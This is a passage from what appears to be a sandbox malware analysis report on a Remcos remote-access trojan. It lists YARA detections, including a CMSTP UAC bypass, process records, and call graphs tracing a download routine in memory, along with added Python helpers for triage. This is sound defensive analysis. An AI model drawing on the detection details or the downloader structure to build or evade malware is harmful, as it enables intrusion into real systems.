                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              Antivirus matches:
                                                                              • Detection: 39%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:9
                                                                              Start time:11:30:34
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:11:30:35
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 656
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:11:30:37
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:11:30:38
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 712
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:11:30:40
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 640
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:20
                                                                              Start time:11:30:41
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:22
                                                                              Start time:11:30:43
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:26
                                                                              Start time:11:30:44
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 736
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:28
                                                                              Start time:11:30:46
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 756
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:30
                                                                              Start time:11:30:47
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 772
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:32
                                                                              Start time:11:30:49
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 776
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:34
                                                                              Start time:11:30:51
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:36
                                                                              Start time:11:30:52
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 784
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:38
                                                                              Start time:11:30:54
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 792
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:40
                                                                              Start time:11:30:56
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 708
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:42
                                                                              Start time:11:30:57
                                                                              Start date:16/12/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 720
                                                                              Imagebase:0x5a0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true
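
All nine WerFault.exe records above carry the same "-u -p 7088 -s <event handle>" arguments: Windows Error Reporting was started nine times in thirteen seconds (11:30:44 to 11:30:57) for the same faulting process, PID 7088, each time with a fresh event handle. WerFault itself is a benign system binary; the finding is that whatever ran as PID 7088 crashed repeatedly and was relaunched, which a practitioner resolves by looking PID 7088 up in the report's process tree rather than by examining WerFault. The helper below is an added example, not part of the Joe Sandbox report: it parses records in the report's Key:Value layout, groups WerFault invocations by the -p PID and flags PIDs that crash repeatedly inside a short window. The embedded sample is a constructed excerpt of the first three records above; the thresholds (three reports within sixty seconds) are assumptions.

```python
"""Triage helper for Joe Sandbox "Target ID" process records (added example,
not part of the report).

Each record is a run of "Key:Value" lines separated by a blank line. Windows
Error Reporting starts "WerFault.exe -u -p <pid> -s <event handle>", where -p
is the PID of the faulting process, so several WerFault records naming one PID
inside a few seconds mean that process (or code injected into it) kept
crashing and being relaunched.
"""
import re
from collections import defaultdict
from datetime import datetime

WERFAULT_RE = re.compile(r"WerFault\.exe\s+-u\s+-p\s+(\d+)\s+-s\s+(\d+)", re.IGNORECASE)

# Constructed excerpt: the first three WerFault records of this report, with
# the fields that do not vary between them left out.
SAMPLE_RECORDS = r"""
Target ID:26
Start time:11:30:44
Start date:16/12/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 736
Has elevated privileges:true

Target ID:28
Start time:11:30:46
Start date:16/12/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 756
Has elevated privileges:true

Target ID:30
Start time:11:30:47
Start date:16/12/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 772
Has elevated privileges:true
"""


def parse_records(text):
    """Split report text into a list of {key: value} dicts, one per process record."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            # partition on the first ':' only, so "Start time:11:30:44" keeps its value intact
            key, sep, value = line.strip().partition(":")
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def record_time(rec):
    """Combine the report's 'Start date' (dd/mm/yyyy) and 'Start time' fields."""
    return datetime.strptime(rec["Start date"] + " " + rec["Start time"], "%d/%m/%Y %H:%M:%S")


def werfault_targets(records):
    """Group WerFault records by the crashed PID (-p) and summarise each group."""
    groups = defaultdict(list)
    for rec in records:
        m = WERFAULT_RE.search(rec.get("Commandline", ""))
        if m:
            groups[m.group(1)].append((record_time(rec), m.group(2), rec.get("Target ID")))
    summary = {}
    for pid, hits in groups.items():
        hits.sort()
        summary[pid] = {
            "count": len(hits),
            "first": hits[0][0],
            "last": hits[-1][0],
            "span_seconds": (hits[-1][0] - hits[0][0]).total_seconds(),
            "event_handles": [h[1] for h in hits],
            "targets": [h[2] for h in hits],
        }
    return summary


def crash_loops(summary, min_count=3, window_seconds=60):
    """PIDs with at least min_count WerFault reports inside window_seconds (thresholds assumed)."""
    return {pid: s for pid, s in summary.items()
            if s["count"] >= min_count and s["span_seconds"] <= window_seconds}


if __name__ == "__main__":
    summary = werfault_targets(parse_records(SAMPLE_RECORDS))
    for pid, s in crash_loops(summary).items():
        print(f"PID {pid}: {s['count']} WerFault reports between {s['first']:%H:%M:%S} "
              f"and {s['last']:%H:%M:%S} (Target IDs {', '.join(s['targets'])})")
```

Pasting the full set of nine records above into SAMPLE_RECORDS yields a single group for PID 7088 spanning thirteen seconds; any other PID that shows up in the same output is a second crashing process worth the same look-up.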

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1708720099.0000000007360000.00000010.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_7360000_mshta.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 95147af8150b91952367746f1f33ae8d4da448246054ac5ec2ed8ee87c01239d
                                                                                • Instruction ID: 292d51b97791718f0da82449b13ed88ea3216a3ef518b0d4881114bf30765049
                                                                                • Opcode Fuzzy Hash: 95147af8150b91952367746f1f33ae8d4da448246054ac5ec2ed8ee87c01239d
                                                                                • Instruction Fuzzy Hash: 9601D8F0A043059FEB518FB88896BEE7BF9AF49314F180469EA04EB285C6749842C794
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1708745490.0000000006F60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_6f60000_mshta.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                • Instruction ID: 5fe9ad2a142b546023d3e9ae9136791d27715d02cddfec91778160030de85698
                                                                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                • Instruction Fuzzy Hash:

                                                                                Execution Graph

                                                                                Execution Coverage:4.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:12.1%
                                                                                Total number of Nodes:58
                                                                                Total number of Limit Nodes:7
                                                                                execution_graph 9787 28c7570 9788 28c7573 9787->9788 9790 28c75fe 9788->9790 9796 28c7da8 9788->9796 9803 28c7a18 9788->9803 9811 28c7c45 9788->9811 9818 28c7824 9788->9818 9827 28c782a 9788->9827 9789 28c75df 9797 28c7cf9 9796->9797 9835 7124610 9797->9835 9845 71245f5 9797->9845 9798 28c7d57 URLDownloadToFileW 9800 28c7ea8 9798->9800 9800->9789 9805 28c7a4c 9803->9805 9804 28c7d57 URLDownloadToFileW 9808 28c7ea8 9804->9808 9805->9804 9807 28c7b30 9805->9807 9809 7124610 5 API calls 9805->9809 9810 71245f5 5 API calls 9805->9810 9807->9789 9808->9789 9809->9804 9810->9804 9814 28c7b9a 9811->9814 9813 28c7ea8 9813->9789 9815 28c7d57 URLDownloadToFileW 9814->9815 9816 7124610 5 API calls 9814->9816 9817 71245f5 5 API calls 9814->9817 9815->9813 9816->9815 9817->9815 9819 28c782a 5 API calls 9818->9819 9820 28c7829 9819->9820 9821 28c7b30 9820->9821 9824 28c7d57 URLDownloadToFileW 9820->9824 9825 7124610 5 API calls 9820->9825 9826 71245f5 5 API calls 9820->9826 9821->9789 9823 28c7ea8 9823->9789 9824->9823 9825->9824 9826->9824 9831 28c7a18 9827->9831 9828 28c7b30 9828->9789 9830 28c7ea8 9830->9789 9831->9828 9832 28c7d57 URLDownloadToFileW 9831->9832 9833 7124610 5 API calls 9831->9833 9834 71245f5 5 API calls 9831->9834 9832->9830 9833->9832 9834->9832 9836 7124641 9835->9836 9837 7124a93 9835->9837 9836->9837 9839 28c7a18 6 API calls 9836->9839 9841 28c7da8 6 API calls 9836->9841 9842 28c782a 6 API calls 9836->9842 9843 28c7824 6 API calls 9836->9843 9844 28c7c45 6 API calls 9836->9844 9855 28c1bf8 9836->9855 9837->9798 9838 7124a34 9838->9798 9839->9838 9841->9838 9842->9838 9843->9838 9844->9838 9847 712460b 9845->9847 9846 7124a93 9846->9798 9847->9846 9849 28c7a18 6 API calls 9847->9849 9850 28c1bf8 URLDownloadToFileW 9847->9850 9851 28c7da8 6 API calls 9847->9851 9852 28c782a 6 API calls 9847->9852 9853 28c7824 6 API calls 9847->9853 9854 28c7c45 6 API calls 9847->9854 9848 7124a34 9848->9798 9849->9848 9850->9848 9851->9848 9852->9848 9853->9848 9854->9848 9856 28c7e00 URLDownloadToFileW 9855->9856 9858 28c7ea8 9856->9858 9858->9838
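
The execution_graph above is Joe Sandbox's call graph flattened into one token stream. The nodes labelled 28c7xxx and 7124xxx are functions in the powershell.exe regions dumped at 028C0000 and 07120000 (the Memory Dump Source entries below, both "based on PE: false", i.e. code with no image on disk), and several of them are annotated with URLDownloadToFileW. The parser below is an added example, not part of the report or of Joe Sandbox: it rebuilds the adjacency list from the token stream and reports the shortest path from the graph's root to every node that reaches the download API. The token grammar is inferred from the dumps on this page and is an assumption; it also covers the control_flow_graph dumps further down, whose node labels are basic-block ranges and whose annotations include "call <address>". The two embedded excerpts are copied from those dumps.

```python
"""Parser for Joe Sandbox execution_graph / control_flow_graph token streams.

Added example, not part of the report. Token grammar (inferred from the dumps
on this page, an assumption): a node is "<id> <address>" or "<id> <start>-<end>"
followed by optional annotation words ("URLDownloadToFileW", "5 API calls",
"call 7124610"); an edge is "<id>-><id>". Resolving paths from the root node to
the annotated nodes shows which chain of functions ends in the download API.
"""
import re
from collections import defaultdict, deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{6,8}(-[0-9a-f]{6,8})?$")  # address or basic-block range

# Constructed excerpt: a subset of the execution_graph printed in this report.
EXEC_EXCERPT = (
    "execution_graph 9787 28c7570 9788 28c7573 9787->9788 9790 28c75fe 9788->9790 "
    "9796 28c7da8 9788->9796 9803 28c7a18 9788->9803 9789 28c75df "
    "9797 28c7cf9 9796->9797 9835 7124610 9797->9835 "
    "9798 28c7d57 URLDownloadToFileW 9800 28c7ea8 9798->9800 9800->9789 "
    "9805 28c7a4c 9803->9805 9804 28c7d57 URLDownloadToFileW 9808 28c7ea8 9804->9808 "
    "9805->9804 9807 28c7b30 9805->9807 9809 7124610 5 API calls 9805->9809 "
    "9807->9789 9808->9789 9809->9804 "
    "9836 7124641 9835->9836 9837 7124a93 9835->9837 9836->9837 9837->9798"
)
# Constructed excerpt of the first control_flow_graph below (basic-block ranges).
CFG_EXCERPT = (
    "control_flow_graph 363 28c7c5e-28c7d52 373 28c7e5d-28c7e63 "
    "379 28c7e71-28c7ea6 URLDownloadToFileW 373->379 "
    "412 28c7d55 call 7124610 363->412 406 28c7d57-28c7d60 412->406"
)


def parse_graph(text):
    """Return ({node id: label}, {node id: [successor ids]})."""
    nodes, edges = {}, defaultdict(list)
    tokens = text.split()
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:                                   # "a->b"
            edges[m.group(1)].append(m.group(2))
            current = None
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok                       # "<id> <address>"
            nodes[current] = tokens[i + 1]
            i += 2
        else:                                   # annotation word of the current node
            if current is not None:
                nodes[current] += " " + tok
            i += 1
    return nodes, edges


def roots(nodes, edges):
    """Nodes with no incoming edge, i.e. the graph's entry points."""
    incoming = {dst for dsts in edges.values() for dst in dsts}
    return sorted(n for n in nodes if n not in incoming)


def shortest_path(edges, src, dst):
    """Breadth-first search; returns the node-id path or None if dst is unreachable."""
    prev = {src: None}
    queue = deque([src])
    while queue:
        n = queue.popleft()
        if n == dst:
            path = []
            while n is not None:
                path.append(n)
                n = prev[n]
            return path[::-1]
        for m in edges.get(n, []):
            if m not in prev:
                prev[m] = n
                queue.append(m)
    return None


def api_paths(text, api="URLDownloadToFileW"):
    """Map every node annotated with `api` to the label path reaching it from a root."""
    nodes, edges = parse_graph(text)
    targets = [n for n, label in nodes.items() if api in label.split()]
    result = {}
    for root in roots(nodes, edges):
        for target in targets:
            path = shortest_path(edges, root, target)
            if path and target not in result:
                result[target] = [nodes[n] for n in path]
    return result


if __name__ == "__main__":
    for target, path in api_paths(EXEC_EXCERPT).items():
        print(f"node {target}: " + " -> ".join(path))
```

Run stand-alone it prints one line per URLDownloadToFileW node, for instance the chain 28c7570 -> 28c7573 -> 28c7a18 -> 28c7a4c -> 28c7d57 URLDownloadToFileW; feeding the complete execution_graph line above to api_paths() lists every route from the entry function into the download call, which is the set of functions to carve out of the 028C0000 dump first.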

                                                                                Control-flow Graph

                                                                                control_flow_graph 337 28c7a18-28c7a4a 338 28c7a4c-28c7a53 337->338 339 28c7a90 337->339 341 28c7a64 338->341 342 28c7a55-28c7a62 338->342 340 28c7a93-28c7acf 339->340 351 28c7b58-28c7b63 340->351 352 28c7ad5-28c7ade 340->352 343 28c7a66-28c7a68 341->343 342->343 344 28c7a6f-28c7a71 343->344 345 28c7a6a-28c7a6d 343->345 349 28c7a82 344->349 350 28c7a73-28c7a80 344->350 348 28c7a8e 345->348 348->340 354 28c7a84-28c7a86 349->354 350->354 355 28c7b65-28c7b68 351->355 356 28c7b72-28c7b94 351->356 352->351 353 28c7ae0-28c7ae6 352->353 357 28c7aec-28c7af9 353->357 358 28c7de8-28c7e52 353->358 354->348 355->356 363 28c7c5e-28c7d52 356->363 364 28c7b9a-28c7ba3 356->364 360 28c7b4f-28c7b56 357->360 361 28c7afb-28c7b2e 357->361 373 28c7e5d-28c7e63 358->373 374 28c7e54-28c7e5a 358->374 360->351 360->353 375 28c7b4b 361->375 376 28c7b30-28c7b33 361->376 412 28c7d55 call 7124610 363->412 413 28c7d55 call 71245f5 363->413 364->358 367 28c7ba9-28c7be7 364->367 386 28c7be9-28c7bff 367->386 387 28c7c01-28c7c14 367->387 378 28c7e65-28c7e6e 373->378 379 28c7e71-28c7ea6 URLDownloadToFileW 373->379 374->373 375->360 380 28c7b3f-28c7b48 376->380 381 28c7b35-28c7b38 376->381 378->379 383 28c7eaf-28c7ec3 379->383 384 28c7ea8-28c7eae 379->384 381->380 384->383 388 28c7c16-28c7c1d 386->388 387->388 391 28c7c1f-28c7c30 388->391 392 28c7c42 388->392 391->392 395 28c7c32-28c7c3b 391->395 392->363 395->392 406 28c7d57-28c7d60 407 28c7d7a-28c7d8d 406->407 408 28c7d62-28c7d78 406->408 409 28c7d8f-28c7d96 407->409 408->409 410 28c7d98-28c7d9e 409->410 411 28c7da5 409->411 410->411 411->358 412->406 413->406
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1814443013.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_28c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5cdc246ff05193bbb1b53b0e60d423393bd149c8c13024dc2aa0aa78d65712ca
                                                                                • Instruction ID: 485cd0f7161a4ccfc690e0cf4546cf5c9bdd65687740ba13f02365a76b2fb573
                                                                                • Opcode Fuzzy Hash: 5cdc246ff05193bbb1b53b0e60d423393bd149c8c13024dc2aa0aa78d65712ca
                                                                                • Instruction Fuzzy Hash: 1FE1FA79A00219EFDB05CF98D584A9EFBB6FF48314F248159E808AB365C731E995CF90

                                                                                Control-flow Graph

                                                                                control_flow_graph 0 7121f40-7121f65 1 7121f6b-7121f70 0->1 2 7122158-71221a2 0->2 3 7121f72-7121f78 1->3 4 7121f88-7121f8c 1->4 19 7122326-712236a 2->19 20 71221a8-71221ad 2->20 5 7121f7a 3->5 6 7121f7c-7121f86 3->6 7 7121f92-7121f94 4->7 8 7122108-7122112 4->8 5->4 6->4 12 7121f96-7121fa2 7->12 13 7121fa4 7->13 10 7122120-7122126 8->10 11 7122114-712211d 8->11 14 7122128-712212a 10->14 15 712212c-7122138 10->15 17 7121fa6-7121fa8 12->17 13->17 21 712213a-7122155 14->21 15->21 17->8 22 7121fae-7121fcd 17->22 33 7122480-71224b5 19->33 34 7122370-7122375 19->34 23 71221c5-71221c9 20->23 24 71221af-71221b5 20->24 47 7121fcf-7121fdb 22->47 48 7121fdd 22->48 29 71222d8-71222e2 23->29 30 71221cf-71221d1 23->30 26 71221b7 24->26 27 71221b9-71221c3 24->27 26->23 27->23 35 71222e4-71222ec 29->35 36 71222ef-71222f5 29->36 37 71221d3-71221df 30->37 38 71221e1 30->38 62 71224e3-71224ed 33->62 63 71224b7-71224d9 33->63 41 7122377-712237d 34->41 42 712238d-7122391 34->42 44 71222f7-71222f9 36->44 45 71222fb-7122307 36->45 43 71221e3-71221e5 37->43 38->43 49 7122381-712238b 41->49 50 712237f 41->50 53 7122432-712243c 42->53 54 7122397-7122399 42->54 43->29 51 71221eb-712220a 43->51 52 7122309-7122323 44->52 45->52 58 7121fdf-7121fe1 47->58 48->58 49->42 50->42 87 712221a 51->87 88 712220c-7122218 51->88 56 7122449-712244f 53->56 57 712243e-7122446 53->57 60 712239b-71223a7 54->60 61 71223a9 54->61 66 7122451-7122453 56->66 67 7122455-7122461 56->67 58->8 68 7121fe7-7121fee 58->68 64 71223ab-71223ad 60->64 61->64 69 71224f7-71224fd 62->69 70 71224ef-71224f4 62->70 98 71224db-71224e0 63->98 99 712252d-7122556 63->99 64->53 74 71223b3-71223b5 64->74 75 7122463-712247d 66->75 67->75 68->2 76 7121ff4-7121ff9 68->76 77 7122503-712250f 69->77 78 71224ff-7122501 69->78 79 71223b7-71223bd 74->79 80 71223cf-71223d6 74->80 83 7122011-7122020 76->83 84 7121ffb-7122001 76->84 85 7122511-712252a 77->85 78->85 90 71223c1-71223cd 79->90 91 71223bf 79->91 94 71223d8-71223de 80->94 95 71223ee-712242f 80->95 83->8 110 7122026-7122044 83->110 92 7122003 84->92 93 7122005-712200f 84->93 104 712221c-712221e 87->104 88->104 90->80 91->80 92->83 93->83 100 71223e2-71223ec 94->100 101 71223e0 94->101 117 7122585-71225b4 99->117 118 7122558-712257e 99->118 100->95 101->95 104->29 106 7122224-712225b 104->106 126 7122275-712227c 106->126 127 712225d-7122263 106->127 110->8 121 712204a-712206f 110->121 128 71225b6-71225d3 117->128 129 71225ed-71225f7 117->129 118->117 121->8 146 7122075-712207c 121->146 130 7122294-71222d5 126->130 131 712227e-7122284 126->131 135 7122267-7122273 127->135 136 7122265 127->136 144 71225d5-71225e7 128->144 145 712263d-7122642 128->145 132 7122600-7122606 129->132 133 71225f9-71225fd 129->133 138 7122286 131->138 139 7122288-7122292 131->139 142 7122608-712260a 132->142 143 712260c-7122618 132->143 147 712261a-712263a 142->147 143->147 144->129 145->144 150 71220c2-71220f5 146->150 151 712207e-7122099 146->151 165 71220fc-7122105 150->165 157 71220b3-71220b7 151->157 158 712209b-71220a1 151->158 163 71220be-71220c0 157->163 161 71220a3 158->161 162 71220a5-71220b1 158->162 161->157 162->157 163->165
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                • API String ID: 0-1420252700
                                                                                • Opcode ID: e8cda80fdfe76ced4fcd342a0418cd92b8334ede88b4f48bacc5fcfab42745f4
                                                                                • Instruction ID: 69a5a878646a9c4214e63cba98e1fe84e5b67604ec4cbbdfd9db73d5e12af2e2
                                                                                • Opcode Fuzzy Hash: e8cda80fdfe76ced4fcd342a0418cd92b8334ede88b4f48bacc5fcfab42745f4
                                                                                • Instruction Fuzzy Hash: B8125BB17043658FCB168B688800B6EBFA1BFD5210F1580AAD905CF2D5DB31C9A7D7A2

                                                                                Control-flow Graph

                                                                                [Control-flow graph omitted: function at 0x7124610, basic blocks 0x7124610-0x7124bce. No Win32 API is called directly; the single call site at 0x7124a2f resolved to six targets: 0x28c7a18, 0x28c1bf8, 0x28c7da8, 0x28c782a, 0x28c7824 and 0x28c7c45.]
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP^q$tP^q
                                                                                • API String ID: 0-309238000
                                                                                • Opcode ID: 558d5b2237cba048f15d24093ce6ac10bc7a615790aa9371d4eb45614441c896
